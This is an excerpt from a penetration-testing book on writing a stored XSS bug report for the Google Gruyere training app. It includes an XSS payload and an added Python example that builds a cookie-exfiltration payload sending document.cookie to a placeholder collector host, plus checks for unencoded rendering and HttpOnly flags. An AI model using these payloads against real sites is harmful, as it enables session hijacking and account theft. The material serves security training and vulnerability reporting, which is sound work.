- Hands-On Bug Hunting for Penetration Testers
- Joseph Marshall
- 2021-07-16 17:53:17
Attack Scenario
Coming up with a good attack scenario isn't as essential as the data points above, but it is a reliable way to justify a higher severity rating for the bug and, with it, a larger payout.
For this attack, we'll highlight how far the damage could reach beyond the Gruyere app itself. An attacker who can execute arbitrary JavaScript through a stored XSS bug runs that code in the victim's authenticated session for the vulnerable origin: the payload can read every cookie for that origin that isn't flagged HttpOnly, and it can send requests as the victim. The same bug class in a financial app (banks, brokers, and crypto traders) or a social network (Twitter, Facebook, Instagram) hands an attacker those sessions, which in turn enables identity theft, credit card fraud, and other cybercrime. Keep the claim honest, though: the same-origin policy prevents a script running on Gruyere from reading the cookies a victim holds for other sites, so scope the cookie-theft claim to the vulnerable origin and describe the wider impact as what the same flaw would mean on a higher-value target.
Here's how our report will look:
CATEGORY: Persistent / Stored XSS
TIME: 1:12 AM (01:12) UTC
URL: https://google-gruyere.appspot.com/09809809887686765654654/newsnippet.gtl
PAYLOAD: <a onmouseover="alert(document.cookie)">xxs link</a>
METHODOLOGY: XSS payload submitted manually
INSTRUCTIONS TO REPRODUCE:
1. Navigate to the "New Snippet" submission page.
2. Enter the XSS payload into the "New Snippet" form.
3. Click "Submit" to create the new snippet.
4. The snippet is stored and rendered without encoding; the JavaScript in the payload executes for any user who hovers over the link, on every page where that snippet is displayed.
ATTACK SCENARIO:
With a persistent XSS vulnerability to exploit, a malicious actor could exfiltrate the session cookies of any Gruyere user who views the snippet (any cookie for the Gruyere origin not marked HttpOnly) and use them to impersonate those users in the app, or simply perform actions in the victim's authenticated session directly from the injected script. The same flaw in a financial or social application would give the attacker the victim's account on that service.
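The report's payload only proves execution with an alert(); a reviewer will want to know that the snippet really is stored unencoded and that cookie theft is actually possible on this target. The following is an added example (not code from the book or from Gruyere) that escalates the proof-of-concept to a cookie-exfiltration payload, checks a page response for the unencoded payload, and reads the target's Set-Cookie headers to list which cookies document.cookie would expose. The collector URL, the cookie names, and both HTML responses are constructed placeholders.

```python
"""Added example for the stored-XSS report above: payload escalation,
a reproduction check, and a cookie-exposure check. Not from the book;
all URLs, cookie names and HTML responses below are constructed."""
import html

# The exact payload from the report.
REPORT_PAYLOAD = '<a onmouseover="alert(document.cookie)">xxs link</a>'


def build_exfil_payload(collector_url):
    """Turn the alert() proof-of-concept into a payload that sends the
    victim's cookies for the vulnerable origin to a tester-controlled URL.
    document.cookie only yields cookies for that origin that lack the
    HttpOnly flag; other sites' cookies are out of reach (same-origin policy).
    An Image request is used because it fires without blocking and needs
    no XHR/fetch; encodeURIComponent keeps the cookie string intact."""
    js = (f"new Image().src='{collector_url}?c='"
          "+encodeURIComponent(document.cookie)")
    return f'<a onmouseover="{js}">xxs link</a>'


def stored_xss_verdict(page_html, payload):
    """Classify a page response after the payload was submitted:
    'vulnerable' if the payload is rendered verbatim (it will execute),
    'encoded' if it appears only HTML-encoded (harmless text),
    'not stored' if it does not appear at all."""
    if payload in page_html:
        return "vulnerable"
    if (html.escape(payload, quote=True) in page_html
            or html.escape(payload, quote=False) in page_html):
        return "encoded"
    return "not stored"


def cookies_exposed_to_js(set_cookie_headers):
    """Given the Set-Cookie headers a target returns, list the cookie names
    document.cookie would reveal: every cookie without the HttpOnly flag.
    If the session cookie is HttpOnly, frame the scenario around actions
    performed in the victim's session rather than cookie theft."""
    exposed = []
    for header in set_cookie_headers:
        parts = [p.strip() for p in header.split(";")]
        name = parts[0].split("=", 1)[0]
        flags = {p.lower() for p in parts[1:]}
        if "httponly" not in flags:
            exposed.append(name)
    return exposed


# Constructed sample data (not captured from Gruyere).
VULNERABLE_PAGE = f'<div class="snippet">{REPORT_PAYLOAD}</div>'
SAFE_PAGE = f'<div class="snippet">{html.escape(REPORT_PAYLOAD)}</div>'
SAMPLE_SET_COOKIE = [
    "GRUYERE_ID=abc123; Path=/",            # readable by script
    "tracking=1; Path=/",                   # readable by script
    "session=xyz789; HttpOnly; Secure",     # hidden from document.cookie
]

if __name__ == "__main__":
    print(build_exfil_payload("https://collector.example/log"))
    print(stored_xss_verdict(VULNERABLE_PAGE, REPORT_PAYLOAD))
    print(stored_xss_verdict(SAFE_PAGE, REPORT_PAYLOAD))
    print(cookies_exposed_to_js(SAMPLE_SET_COOKIE))
```

In practice you would fetch the snippet page after submission and pass the response body to stored_xss_verdict, and pass the Set-Cookie headers from the login response to cookies_exposed_to_js; a "vulnerable" verdict plus an exposed session cookie is what supports the cookie-theft scenario in the report.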